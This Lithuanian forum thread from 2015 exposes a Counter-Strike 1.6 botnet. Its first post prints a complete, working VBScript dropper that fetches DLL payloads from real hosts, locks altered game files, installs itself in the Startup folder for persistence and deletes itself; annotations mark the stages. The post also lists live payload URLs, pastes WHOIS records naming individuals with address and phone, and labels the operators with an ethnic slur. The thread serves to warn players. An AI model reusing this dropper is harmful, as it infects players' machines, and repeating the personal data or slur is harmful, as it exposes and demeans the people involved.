
Cigonu slowhack'eriu tinklo analize(pildoma)

Posted: 2015 Dec 16 01:37
by sss
post'o - http://amxmodx.lt/viewtopic.php?f=41&t=6840 tesinys

Parazitas, pasitelkdamas ivairius budus, uzkrecia klientus per farmserverius, kurie patampa botnetu: nekaltam client'ui atsiunciami failai naudojant vb scripta ir cs launcheri kaip atsiustu dll injectoriu, sudarkomi zaidimo failai ir aibe kitu dalyku.






Prisegta virusiniu failu offline versija (jeigu netycia parazitas "sumetytu pedas"), atsiusta naudojantis httrack programa analizei ir kaip irodymas. Failai paimti is:



http://www.upload.ee/files/5405822/web_ ... k.rar.html


ms-shadow.ro/NexonUp
stockdownload.eu/NexonCs
vipsmiley.cf/NexonCs



vienas is parazitu failu:


' ANALYSIS NOTES (malware sample, reproduced for study - do not run outside an isolated lab).
' This Windows Script Host script acts as an updater/dropper inside a Counter-Strike 1.6
' game directory (all paths are relative to the current working directory). In order, it:
'   1. downloads GTProtector.dll / .asi / .ini over plain HTTP into *.upk staging files,
'   2. overwrites server-list, menu, config and MOTD files with remote content,
'   3. empties several client .cfg / .rc files and locks them read-only,
'   4. force-kills hl.exe, swaps the staged binaries into place and relaunches the game,
'   5. drops a copy of NexonUp.vbs into the user's Startup folder and runs it,
'   6. deletes itself.
' Nothing that is downloaded is verified (no HTTPS, no hash, no signature, no HTTP status check).
' Defender view: wscript/cscript fetching a .dll over HTTP, files with attributes
' hidden+system+readonly inside a game folder, a new .vbs in the Startup folder and a
' self-deleting script are the observable behaviours worth alerting on.

' Resets a file's attributes to 0 (normal) so it can be deleted or replaced.
' No-op when the file does not exist.
Sub unProtectFile( filename )
    dim readfile, filesys
    set filesys = CreateObject("Scripting.FileSystemObject")

    If filesys.FileExists( filename ) Then
        set readfile = filesys.GetFile( filename )
        readfile.Attributes = 0 ' normal
    End If
End Sub

' Sets a file's attributes to 7 (hidden + system + read-only).
' Effect: the file is hidden in default Explorer views and the game/user cannot
' overwrite it without first clearing the attributes. No-op when the file does not exist.
Sub protectFile( filename )
    dim readfile, filesys
    set filesys = CreateObject("Scripting.FileSystemObject")

    If filesys.FileExists( filename ) Then
        set readfile = filesys.GetFile( filename )
        readfile.Attributes = 7 ' hidden + system + readonly
    End If
End Sub

' Deletes a file if it exists: clears its attributes first, then force-deletes it.
Sub DeleteAFile( filename )
    Dim filesys
    Set filesys = CreateObject("Scripting.FileSystemObject")

    If filesys.FileExists( filename ) Then
        unProtectFile( filename )
        filesys.DeleteFile( filename ), True
    End If
End Sub

' Renames/moves a file if the source exists. Does not remove an existing target;
' callers delete the target beforehand.
Sub RenameFile( oldName, newName )
    Dim filesys
    Set filesys = WScript.CreateObject("Scripting.FileSystemObject")

    If filesys.FileExists( oldName ) Then
        filesys.MoveFile oldName, newName
    End If
End Sub

' Replaces the file at `path` with an empty file and locks it with protectFile.
' NOTE(review): ForWriting is never defined in the visible script; unless it is declared
' elsewhere it evaluates to Empty, i.e. the "overwrite" argument is effectively False.
' The preceding DeleteAFile is what makes the create succeed.
Sub ClearCFG( path )
    DeleteAFile path
    Set objFSO = CreateObject("Scripting.FileSystemObject")
    Set objFile = objFSO.CreateTextFile(path, ForWriting)
    objFile.Write ""
    objFile.Close

    protectFile path
End Sub

' Force-deletes a folder (and its contents) if it exists.
Sub DeleteAFolder( foldername )
    Dim filesys
    Set filesys = CreateObject("Scripting.FileSystemObject")

    If filesys.FolderExists( foldername ) Then
        ' unProtectFile( foldername )
        filesys.DeleteFolder( foldername ), True
    End If
End Sub

' Renames/moves a folder if the source exists.
Sub RenameFolder( oldName, newName )
    Dim filesys
    Set filesys = WScript.CreateObject("Scripting.FileSystemObject")

    If filesys.FolderExists( oldName ) Then
        filesys.MoveFolder oldName, newName
    End If
End Sub

' --- Stage 1: fetch the binary payloads into staging files -------------------------------
' The "?" & Rnd suffix appends a number as a query string, presumably as a cache-buster.
' NOTE(review): Randomize is never called in the visible code, so the Rnd sequence is likely
' identical on every run - confirm before relying on it as a network signature.
' Binary download via XMLHTTP + ADODB.Stream; only a COM error is checked, not the HTTP status.
strURL="http://ms-shadow.ro/NexonUp/GTProtector.dll?" & Rnd
On Error Resume Next
    Set xml = CreateObject("Microsoft.XMLHTTP")
    xml.Open "GET", strURL, False
    xml.Send

    If Err.Number <> 0 Then
        WScript.Quit    ' if file download fails, quit script
    Else
        set oStream = createobject("Adodb.Stream")
        oStream.type = 1 ' adTypeBinary
        oStream.open
        oStream.write xml.responseBody

        ' overwrite
        oStream.savetofile "GTProtector.dll.upk", 2 ' adSaveCreateOverWrite
        oStream.close

        set oStream = nothing
        Set xml = Nothing
    End If
    Err.Clear
On Error Goto 0

' Same pattern for the .asi companion file.
strURL="http://ms-shadow.ro/NexonUp/GTProtector.asi?" & Rnd
On Error Resume Next
    Set xml = CreateObject("Microsoft.XMLHTTP")
    xml.Open "GET", strURL, False
    xml.Send

    If Err.Number <> 0 Then
        WScript.Quit    ' if file download fails, quit script
    Else
        set oStream = createobject("Adodb.Stream")
        oStream.type = 1 ' adTypeBinary
        oStream.open
        oStream.write xml.responseBody

        ' overwrite
        oStream.savetofile "GTProtector.asi.upk", 2 ' adSaveCreateOverWrite
        oStream.close

        set oStream = nothing
        Set xml = Nothing
    End If
    Err.Clear
On Error Goto 0

' --- Stage 2: text downloads -------------------------------------------------------------
' Every stanza below follows one template: GET a URL, and on success delete the local
' file, recreate it with the response text, then lock it (attributes = 7).
' On a request error the stanza is skipped silently (empty Then branch).

' Staged configuration for the downloaded DLL.
On Error Resume Next
    Set objHTTP = CreateObject("MSXML2.XMLHTTP")
    Call objHTTP.Open("GET", "http://ms-shadow.ro/NexonUp/GTProtector.ini?" & Rnd, FALSE)
    objHTTP.Send

    If Err.Number <> 0 Then

    Else
        DeleteAFile "GTProtector.ini.upk"
        Set objFSO = CreateObject("Scripting.FileSystemObject")
        Set objFile = objFSO.CreateTextFile("GTProtector.ini.upk", ForWriting)
        objFile.Write objHTTP.ResponseText
        objFile.Close
        protectFile("GTProtector.ini.upk")
    End If
On Error Goto 0

' The next four stanzas write the same remote MasterServers.vdf to four local paths.
' NOTE(review): presumably this repoints the client's server list at operator-controlled
' master servers - inferred from the file names, not shown by the script itself.
On Error Resume Next
    Set objHTTP = CreateObject("MSXML2.XMLHTTP")
    Call objHTTP.Open("GET", "http://stockdownload.eu/NexonUp/MasterServers.vdf?" & Rnd, FALSE)
    objHTTP.Send

    If Err.Number <> 0 Then

    Else
        DeleteAFile "config\MasterServers.vdf"
        Set objFSO = CreateObject("Scripting.FileSystemObject")
        Set objFile = objFSO.CreateTextFile("config\MasterServers.vdf", ForWriting)
        objFile.Write objHTTP.ResponseText
        objFile.Close
        protectFile("config\MasterServers.vdf")
    End If
On Error Goto 0

On Error Resume Next
    Set objHTTP = CreateObject("MSXML2.XMLHTTP")
    Call objHTTP.Open("GET", "http://stockdownload.eu/NexonUp/MasterServers.vdf?" & Rnd, FALSE)
    objHTTP.Send

    If Err.Number <> 0 Then

    Else
        DeleteAFile "config\rev_MasterServers.vdf"
        Set objFSO = CreateObject("Scripting.FileSystemObject")
        Set objFile = objFSO.CreateTextFile("config\rev_MasterServers.vdf", ForWriting)
        objFile.Write objHTTP.ResponseText
        objFile.Close
        protectFile("config\rev_MasterServers.vdf")
    End If
On Error Goto 0

On Error Resume Next
    Set objHTTP = CreateObject("MSXML2.XMLHTTP")
    Call objHTTP.Open("GET", "http://stockdownload.eu/NexonUp/MasterServers.vdf?" & Rnd, FALSE)
    objHTTP.Send

    If Err.Number <> 0 Then

    Else
        DeleteAFile "platform\config\MasterServers.vdf"
        Set objFSO = CreateObject("Scripting.FileSystemObject")
        Set objFile = objFSO.CreateTextFile("platform\config\MasterServers.vdf", ForWriting)
        objFile.Write objHTTP.ResponseText
        objFile.Close
        protectFile("platform\config\MasterServers.vdf")
    End If
On Error Goto 0

On Error Resume Next
    Set objHTTP = CreateObject("MSXML2.XMLHTTP")
    Call objHTTP.Open("GET", "http://stockdownload.eu/NexonUp/MasterServers.vdf?" & Rnd, FALSE)
    objHTTP.Send

    If Err.Number <> 0 Then

    Else
        DeleteAFile "platform\config\rev_MasterServers.vdf"
        Set objFSO = CreateObject("Scripting.FileSystemObject")
        Set objFile = objFSO.CreateTextFile("platform\config\rev_MasterServers.vdf", ForWriting)
        objFile.Write objHTTP.ResponseText
        objFile.Close
        protectFile("platform\config\rev_MasterServers.vdf")
    End If
On Error Goto 0

' Server-browser settings, written to two locations.
On Error Resume Next
    Set objHTTP = CreateObject("MSXML2.XMLHTTP")
    Call objHTTP.Open("GET", "http://ms-shadow.ro/NexonUp/ServerBrowser.vdf?" & Rnd, FALSE)
    objHTTP.Send

    If Err.Number <> 0 Then

    Else
        DeleteAFile "config\ServerBrowser.vdf"
        Set objFSO = CreateObject("Scripting.FileSystemObject")
        Set objFile = objFSO.CreateTextFile("config\ServerBrowser.vdf", ForWriting)
        objFile.Write objHTTP.ResponseText
        objFile.Close
        protectFile("config\ServerBrowser.vdf")
    End If
On Error Goto 0

On Error Resume Next
    Set objHTTP = CreateObject("MSXML2.XMLHTTP")
    Call objHTTP.Open("GET", "http://ms-shadow.ro/NexonUp/ServerBrowser.vdf?" & Rnd, FALSE)
    objHTTP.Send

    If Err.Number <> 0 Then

    Else
        DeleteAFile "platform\config\ServerBrowser.vdf"
        Set objFSO = CreateObject("Scripting.FileSystemObject")
        Set objFile = objFSO.CreateTextFile("platform\config\ServerBrowser.vdf", ForWriting)
        objFile.Write objHTTP.ResponseText
        objFile.Close
        protectFile("platform\config\ServerBrowser.vdf")
    End If
On Error Goto 0

' Game menu resource replaced with remote content.
On Error Resume Next
    Set objHTTP = CreateObject("MSXML2.XMLHTTP")
    Call objHTTP.Open("GET", "http://ms-shadow.ro/NexonUp/GameMenu.res?" & Rnd, FALSE)
    objHTTP.Send

    If Err.Number <> 0 Then

    Else
        DeleteAFile "cstrike\resource\GameMenu.res"
        Set objFSO = CreateObject("Scripting.FileSystemObject")
        Set objFile = objFSO.CreateTextFile("cstrike\resource\GameMenu.res", ForWriting)
        objFile.Write objHTTP.ResponseText
        objFile.Close
        protectFile("cstrike\resource\GameMenu.res")
    End If
On Error Goto 0

' userconfig.cfg replaced with remote content: the remote side controls the console
' commands this file contains.
On Error Resume Next
    Set objHTTP = CreateObject("MSXML2.XMLHTTP")
    Call objHTTP.Open("GET", "http://ms-shadow.ro/NexonUp/userconfig.cfg?" & Rnd, FALSE)
    objHTTP.Send

    If Err.Number <> 0 Then

    Else
        DeleteAFile "cstrike\userconfig.cfg"
        Set objFSO = CreateObject("Scripting.FileSystemObject")
        Set objFile = objFSO.CreateTextFile("cstrike\userconfig.cfg", ForWriting)
        objFile.Write objHTTP.ResponseText
        objFile.Close
        protectFile("cstrike\userconfig.cfg")
    End If
On Error Goto 0

' MOTD template replaced; the previous one is kept as motd_temp.html.old.
On Error Resume Next
    Set objHTTP = CreateObject("MSXML2.XMLHTTP")
    Call objHTTP.Open("GET", "http://ms-shadow.ro/NexonUp/motd_temp.html?" & Rnd, FALSE)
    objHTTP.Send

    If Err.Number <> 0 Then

    Else
        DeleteAFile "cstrike\motd_temp.html.old"
        RenameFile "cstrike\motd_temp.html", "cstrike\motd_temp.html.old"
        DeleteAFile "cstrike\motd_temp.html"
        Set objFSO = CreateObject("Scripting.FileSystemObject")
        Set objFile = objFSO.CreateTextFile("cstrike\motd_temp.html", ForWriting)
        objFile.Write objHTTP.ResponseText
        objFile.Close
        protectFile("cstrike\motd_temp.html")
    End If
On Error Goto 0

' --- Stage 3: blank out and lock client config files -------------------------------------
' Each listed file is replaced by an empty, hidden+system+read-only file, so whatever the
' player (or another tool) had in these configs is lost and cannot be rewritten normally.
On Error Resume Next
    ClearCFG "cstrike\hw\geforce.cfg"
    ClearCFG "cstrike\hw\opengl.cfg"
    ClearCFG "cstrike\autoexec.cfg"
    ' ClearCFG "cstrike\userconfig.cfg"
    ClearCFG "cstrike\valve.rc"

    ClearCFG "valve\hw\geforce.cfg"
    ClearCFG "valve\hw\opengl.cfg"
    ClearCFG "valve\valve.rc"
On Error Goto 0

' --- Stage 4: stop the game so its files can be swapped ----------------------------------
' Force-terminates the running game process; the fixed 3 s sleep waits for handles to close.
CreateObject("WScript.Shell").Run("taskkill /f /im hl.exe")

WScript.Sleep(3000)

On Error Resume Next
    ' Remove leftovers of a previous run.
    DeleteAFolder "cstrike\bin_old"
    DeleteAFile "cstrike\bin_old"

    DeleteAFile "GTProtector.dll.old"
    DeleteAFile "GTProtector.asi.old"
    DeleteAFile "GTProtector.ini.old"

    ' Move cstrike\bin out of the way (handled both as a folder and as a file).
    RenameFolder "cstrike\bin", "cstrike\bin_old"
    RenameFile "cstrike\bin", "cstrike\bin_old"

    ' Rotate the currently installed payload to *.old ...
    RenameFile "GTProtector.dll", "GTProtector.dll.old"
    RenameFile "GTProtector.asi", "GTProtector.asi.old"
    RenameFile "GTProtector.ini", "GTProtector.ini.old"

    ' ... and promote the freshly downloaded staging files.
    RenameFile "GTProtector.dll.upk", "GTProtector.dll"
    RenameFile "GTProtector.asi.upk", "GTProtector.asi"
    RenameFile "GTProtector.ini.upk", "GTProtector.ini"

    protectFile("GTProtector.dll")
    protectFile("GTProtector.asi")
    protectFile("GTProtector.ini")

    ' liblist.gam is locked but not modified by this script.
    protectFile("cstrike\liblist.gam")

    ' Delete a fixed list of other DLL/ASI files.
    ' NOTE(review): whether these are the game's own modules or competing injected
    ' modules cannot be told from the script - check against a clean install.
    DeleteAFile "cstrike\bin\TrackerUI.dll"
    DeleteAFile "valve\bin\TrackerUI.dll"
    DeleteAFile "cstrike\cl_dlls\ParticleMan.dll"
    DeleteAFile "NexonUp.asi"
    DeleteAFile "CsShield.dll"

    ' Fallback for files the delete above could not remove: rename, then delete again.
    RenameFile "cstrike\bin\TrackerUI.dll", "cstrike\bin\TrackerUI.dll.old"
    RenameFile "valve\bin\TrackerUI.dll", "valve\bin\TrackerUI.dll.old"
    RenameFile "cstrike\cl_dlls\ParticleMan.dll", "cstrike\cl_dlls\ParticleMan.dll.old"
    RenameFile "NexonUp.asi", "NexonUp.asi.old"
    RenameFile "CsShield.dll", "CsShield.dll.old"

    DeleteAFile "cstrike\bin\TrackerUI.dll.old"
    DeleteAFile "valve\bin\TrackerUI.dll.old"
    DeleteAFile "cstrike\cl_dlls\ParticleMan.dll.old"
    DeleteAFile "NexonUp.asi.old"
    DeleteAFile "CsShield.dll.old"

    DeleteAFile "mssv55.asi.old"
    RenameFile "mssv55.asi", "mssv55.asi.old"

    DeleteAFile "msvv82.asi.old"
    RenameFile "msvv82.asi", "msvv82.asi.old"
On Error Goto 0

' Writes a regular FILE at the path cstrike\bin (content: the remote motd_temp.html) and
' locks it. NOTE(review): presumably this blocks a cstrike\bin directory from being
' recreated - the intent is not stated in the script.
On Error Resume Next
    Set objHTTP = CreateObject("MSXML2.XMLHTTP")
    Call objHTTP.Open("GET", "http://ms-shadow.ro/NexonUp/motd_temp.html?" & Rnd, FALSE)
    objHTTP.Send

    If Err.Number <> 0 Then

    Else
        DeleteAFile "cstrike\bin"
        Set objFSO = CreateObject("Scripting.FileSystemObject")
        Set objFile = objFSO.CreateTextFile("cstrike\bin", ForWriting)
        objFile.Write objHTTP.ResponseText
        objFile.Close
        protectFile("cstrike\bin")
    End If
On Error Goto 0

' Relaunch the game with the swapped files in place.
CreateObject("WScript.Shell").Run("hl.exe -steam -game cstrike -noforcemparms -noforcemaccel")

' --- Stage 5: persistence ----------------------------------------------------------------
' Up(): deletes every *.vbs in the current user's Startup folder, downloads NexonUp.vbs
' there and runs it immediately. A script in the Startup folder runs at each logon, so
' this is the re-infection point to remove during cleanup.
' Note the blanket *.vbs delete also removes unrelated startup scripts.
Sub Up()
    Set objShell = Wscript.CreateObject("Wscript.Shell")
    strPath = objShell.SpecialFolders("StartUp")
    strMyPath = strPath & "\"

    On Error Resume Next
    Dim filesys
    Set filesys = CreateObject("Scripting.FileSystemObject")
    filesys.DeleteFile( strMyPath & "*.vbs" ), True
    On Error Goto 0

    On Error Resume Next
        Set objHTTP = CreateObject("MSXML2.XMLHTTP")
        Call objHTTP.Open("GET", "http://ms-shadow.ro/NexonUp/NexonUp.vbs?" & Rnd, FALSE)
        objHTTP.Send

        If Err.Number <> 0 Then

        Else
            DeleteAFile strMyPath & "NexonUp.vbs"
            Set objFSO = CreateObject("Scripting.FileSystemObject")
            Set objFile = objFSO.CreateTextFile(strMyPath & "NexonUp.vbs", ForWriting)
            objFile.Write objHTTP.ResponseText
            objFile.Close
            ' protectFile(strMyPath & "NexonUp.vbs")
        End If
    On Error Goto 0

    ' Chr(34) is a double quote: the path is quoted because it may contain spaces.
    CreateObject("WScript.Shell").Run(Chr(34) & strMyPath & "NexonUp.vbs" & Chr(34))

End Sub

Up()

' --- Stage 6: self-deletion --------------------------------------------------------------
' The running script removes its own file after a 1 s pause, so the original dropper is
' usually absent from disk by the time the machine is examined.
On Error Resume Next
    WScript.Sleep 1000
    Set fileSystem = CreateObject("Scripting.FileSystemObject")
    thisScript = Wscript.ScriptFullName
    fileSystem.DeleteFile(thisScript)
On Error Goto 0

pagrindinis projektas - parazito galva i kuri eina srautas: indungi.ro

salutiniai projektai:

bestia.ro
csgofade.net
ms-boost.com
ms-shadow.ro
vipsmiley.cf
stockdownload.eu


nariai:

anaconda, unpack pagal http://www.extreamcs.com/

nariu domreg info:

Admin Name: Costinel Danut Onofrei
Admin Organization: N/A
Admin Street: Iasi,Comuna Mogosesti-Siret,Strada Tudor Vladimirescu Iasi,Comuna Mogosesti-Siret,Strada Tudor Vladimirescu
Admin City: Iasi,Comuna Mogosesti-Siret,Strada Tudor Vladimirescu
Admin State/Province: Iasi
Admin Postal Code: 73579
Admin Country: RO
Admin Phone: +40.0752811205
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: [email protected]
_
Registrant Name: Emran Costin
Registrant Organization: CSGOFADE.NET
Registrant Street: Germany Germany
Registrant City: Germany
Registrant State/Province: Iasi
Registrant Postal Code: 73579
Registrant Country: RO
Registrant Phone: +00.34123232521
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: [email protected]
Registry Admin ID:

idomus link'as:

stockdownload.eu/NexonPanel



post'as skirtas edukaciniais tikslais - istempti parazitus i dienos sviesa; bet koks failu naudojimas uzkreciant klienta yra baudziamas pagal istatymus

Re: Cigonu slowhack'eriu tinklo analize(pildoma)

Posted: 2015 Dec 16 04:04
by laimiukas3
uzkrestus failus atsiuncia is cia


http://ms-shadow.ro/cstrikex/cstrike/

Re: Cigonu slowhack'eriu tinklo analize(pildoma)

Posted: 2015 Dec 16 18:47
by InvIs2
Na jau čia tikrai tavo sritis, bet yra reikalas kažką bandyti pakeisti, jei tai net ne lt projektas? Šiaip kvailas klausimas, nes tikrai nesuprantu, rimtai klausiu.

Re: Cigonu slowhack'eriu tinklo analize(pildoma)

Posted: 2015 Dec 16 19:42
by sss
1. norint kazka pakeisti legaliai, reikia pereiti per milziniskus biurokratinius labirintus, desimtis instituciju tai trunka 2-3 metus ir ilgiau + pareikalauja 300valandu darbo priklausomai nuo apimties ko pasekoje viskas tampa beprasmiska
2. stabdyti parazitus naudojant ju paciu metodus pries juos pacius yra labai efektyvu, bet yra didele teisine siena i kuria atsimusus kelio atgal nera - tad turint ir labai geru noru ir tikslu siais laikais rankos yra uzristos, jau nekalbant apie zodzio laisve
3. Viska viesinti edukaciniais tikslais, ispeti zmones apie galimus pavojus, projektus ir ju savininkus, zaidejus



Sis projektas "slowhack" prasme iseina is bet kokiu sveiko proto ribu ir yra ko gero didziausias parazitas visoje cs 1.6 bendruomeneje - kaip vezys uzkreciantis nekaltus zaidejus bei kesinantis i ivairius projektus(teko asmeniskai susidurti su ddos atakomis, tycine fake useriu reklama dar 2012 metais butent is sio projekto), savininkas bei grupuote parazituojanciu cigonu asmenu kurie dirba prie to tikrai ne 2 ir ne 5 metus, yra pakankamai issilavine ir geba panaudoti savo zinias blogiems tikslams ka jau ir paminejau

Re: Cigonu slowhack'eriu tinklo analize(pildoma)

Posted: 2015 Dec 27 12:34
by beast
Steam CS tai liečia?

Re: Cigonu slowhack'eriu tinklo analize(pildoma)

Posted: 2015 Dec 27 15:46
by sss
beast wrote:Steam CS tai liečia?
taip, pazeidziamas

Re: Cigonu slowhack'eriu tinklo analize(pildoma)

Posted: 2015 Dec 27 18:37
by laimiukas3
o cia vistiek visi no steam serv kurejai renkasi dingtu tai cs numirtu iskar :) tai manau dalbajobiskas klausimas

Re: Cigonu slowhack'eriu tinklo analize(pildoma)

Posted: 2015 Dec 27 20:03
by sss
laimiukas3 wrote:o cia vistiek visi no steam serv kurejai renkasi dingtu tai cs numirtu iskar :) tai manau dalbajobiskas klausimas
atvirksciai maziau parazitu butu, o jeigu valve paimtu 3rd party serveriu kontrole i savo rankas nebebutu "vjarslynyku" kurie visa community griauna

Re: Cigonu slowhack'eriu tinklo analize(pildoma)

Posted: 2015 Dec 28 06:26
by laimiukas3
sss wrote:
laimiukas3 wrote:o cia vistiek visi no steam serv kurejai renkasi dingtu tai cs numirtu iskar :) tai manau dalbajobiskas klausimas
atvirksciai maziau parazitu butu, o jeigu valve paimtu 3rd party serveriu kontrole i savo rankas nebebutu "vjarslynyku" kurie visa community griauna
nebent steame sitas game taptu free

Re: Cigonu slowhack'eriu tinklo analize(pildoma)

Posted: 2015 Dec 28 14:40
by sss
laimiukas3 wrote:
sss wrote:
laimiukas3 wrote:o cia vistiek visi no steam serv kurejai renkasi dingtu tai cs numirtu iskar :) tai manau dalbajobiskas klausimas
atvirksciai maziau parazitu butu, o jeigu valve paimtu 3rd party serveriu kontrole i savo rankas nebebutu "vjarslynyku" kurie visa community griauna
nebent steame sitas game taptu free
csgo steam jau dabar 4-8x daugiau zaideju negu cs 1.6 steam+non kartu sudejus. Cs 1.6 yra nebesupportinamas kureju, neturi ka pasiulyti zaidejams, o 3rd party community serveriai daugiausiai priklauso parazitams